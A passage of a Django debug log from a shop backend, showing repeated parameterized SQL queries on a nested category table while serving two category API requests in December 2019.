"shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:36,398 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:36,401 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:36,403 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:36,406 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:36,408 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:36,410 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:36,413 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:36,415 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:36,417 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:36,420 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:36,422 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:36,425 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:36,428 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:36,430 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:36,432 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:36,434 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:36,436 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:36,439 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:36,441 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:36,443 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:36,446 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:36,448 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:42,087 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:42,097 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:10:42,103 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:42,109 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:42,113 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:42,118 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [16/Dec/2019 07:10:42] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:10:42,124 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:10:42,128 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:42,133 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:42,137 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:42,141 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:42,148 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:42,153 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:42,157 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:42,161 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:42,165 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:42,171 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:42,175 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:42,179 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:42,182 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:42,189 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:42,196 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:42,200 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:42,204 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:42,208 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:42,212 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:42,216 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:42,222 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:42,227 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:42,231 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:42,235 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:42,240 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:42,246 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:42,250 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:42,254 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:42,259 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:42,263 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:42,269 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:42,273 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:42,277 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:42,281 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:42,285 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:42,291 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:42,296 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:42,300 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:42,304 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 